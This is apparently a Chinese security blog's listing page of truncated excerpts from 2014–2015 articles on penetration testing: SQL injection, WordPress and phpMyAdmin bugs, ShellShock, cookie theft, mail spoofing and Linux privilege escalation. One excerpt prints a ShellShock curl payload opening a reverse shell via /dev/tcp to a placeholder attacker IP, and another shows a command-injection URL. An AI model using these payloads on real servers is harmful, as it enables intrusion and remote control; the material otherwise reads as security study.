渗透流程与思路

admin 10年前 (2015-01-06) 3434浏览 0评论

转自：http://bobao.360.cn/learning/detail/177.html 为什么会有免费的代理？ 因为他可以轻易地感染上千万的用户并窃取数据。 这是从Defcon 20 上偶然发现的，演讲者讲述了他是如何组建一个基于javas...

admin 10年前 (2015-01-04) 3102浏览 0评论

转自：http://drops.wooyun.org/tips/4482 0×00 背景 今天看到zone里有同学发帖说了探测支付宝登录状态的帖子：http://zone.wooyun.org/content/17665 由此我想到了我们parsec...

admin 10年前 (2015-01-04) 8156浏览 0评论

今天遇到了一个order by的mysql盲注，发现order by注入和普通的select注入有很多不一样的地方，下面以该注入点为实例讲解一下order by的注入技巧。 ps：order by注入也是分报错注入和盲注的，由于该注入点是盲注，所以首...

admin 10年前 (2015-01-04) 3439浏览 0评论

一、unserialize()函数特性 wordpress存在一个反序列漏洞比较火，具体漏洞可以看这篇：http://drops.wooyun.org/papers/596， 也可以去看英文的原文：http://vagosec.org/2013/09...

admin 10年前 (2015-01-03) 3945浏览 0评论

0x00 背景 本文是为了揭示那些被忽视的开发安全问题，主要针对基础设施部署环境，基础解决方案包括(内部、外部、云环境)。 0x01 攻击面 GitHub Fun 版本控制工具(Revision Control Tools) 持续集成工具(Conti...

admin 10年前 (2015-01-03) 2813浏览 0评论

SQLiGOD的详细介绍可以参考：MYSQLi小助手——SQLiGODS(联合查询回显） 转自：http://blog.sycsec.com/?p=505 0×00 前言 之前一两个月 国外好像发了一个叫做SQLiGOD的东西 感觉有点6 所以就去研...

admin 10年前 (2014-12-30) 2132浏览 0评论

转自：http://www.cnseay.com/4130/  国内网络安全最大的问题安全管理上，国 内这些大大小小的公司，基本都可以通过社工或者爆破密码的方式渗透进去，所以针对公司自身的渗透测试，我们的要求是只做上线并且业务运行一段时间后的应用 的...

admin 11年前 (2014-12-19) 2815浏览 0评论

转自：http://drops.wooyun.org/tips/968 0x00 基础知识 1、MySQL运算符的优先级 运算符的优先级决定了不同的运算符在表达式中计算的先后顺序。 MySQL中所有运算符的优先级的顺序按照从高到低，从上到下，依次降低...

admin 11年前 (2014-12-02) 2750浏览 0评论

作者：phithon 0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件，基于PHP开发。最新的CVE-2014-8959公告中，提到该程序多个版本存在任意文件包含漏洞，影响版本如下： phpMyAdmin 4.0...

admin 11年前 (2014-10-24) 1739浏览 0评论

前言 上一篇文章 讲解了如何借助前端技术，打造一个比 SSLStrip 更高大上的工具。 今天我们再次使用这套战术，通过前后端的里应外合，实现一个杀手锏级的攻击方案 —— Cookie 数据大喷发。 传统嗅探 在过去，Cookie 的窃取大多通过嗅...

admin 11年前 (2014-10-20) 2333浏览 0评论

这次我（知道创宇余弦）在 QCon 上海做了《程序员与黑客》的演讲，得到很多认可，这点很欣慰。不过演讲超时20分钟，这点不应该。很多同学意犹未尽，我也是。 这篇文章我说说，我为什么要讲这个议题。 我 2008年毕业就进入网络安全公司知道创宇，跟随几...

admin 11年前 (2014-10-07) 4963浏览 0评论

原文：http://sb.f4ck.org/thread-20348-1-1.html 1、google高级搜索intitle:ad.sangfor.com，这个问题几年前发现的，因为设计缺陷造成，现在搜到的结果比以前少很多了。 当然还有其他的手段，...

admin 11年前 (2014-10-06) 8363浏览 0评论

文章：mysql_real_escape_string won’t magically solve your SQL Injection problems。 该文并不是提出了某些方法来绕过mysql_real_escape_string函数来进行绕过...

admin 11年前 (2014-09-29) 2144浏览 0评论

    优酷邮箱服务器允许源地址欺骗漏洞 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源乱用。 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源...

admin 11年前 (2014-09-29) 3465浏览 0评论

本文PDF下载：破壳漏洞（ShellShock）应急概要 V3 密级 公开   破壳漏洞（ShellShock）应急概要  [第三版 2014/9/27 下午] 知道创宇安全研究团队 1.更新情况 版本 时间 描述 ...

admin 11年前 (2014-09-29) 4297浏览 0评论

一、命令执行漏洞分析 利用这个漏洞，需要两个条件： 服务器收到请求后，会执行bash 执行bash的时候，会将UserAgent等设置成环境变量 同时满足这两点的，一般是使用CGI的服务器，所以受到影响的服务器份额(我语文不好)不是很大。 对它进...

admin 11年前 (2014-09-25) 5883浏览 0评论

ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...

admin 11年前 (2014-09-23) 3868浏览 0评论

转自：http://www.hackqing.com/index.asp?FoxNews=1268.html 这个程序在国内用的特别多，特别是那些抓肉鸡的黑阔。 http://localhost:80/?search=%00{.exec|cmd.} ...

admin 11年前 (2014-09-18) 3893浏览 0评论

转自：http://t.qq.com/p/t/330573116082464 当黑客入侵服务器后留下后门，若能及时发现后门可减少不必要的损失。这里以经典的Apache模块后门 mod_rootme 为例，分享下如何从进程行为来检测Linux后门的一些...

admin 11年前 (2014-09-09) 5961浏览 1评论

ps:下面讲的特权技巧只要利用的是用户在切换到root用户时，使用的是su命令，而没有使用su – 命令。如果用户切换到root用户时使用su -命令，或者该用户从不切换到root用户，那么下面讲的提权技巧是无用的。 su 与 su &#...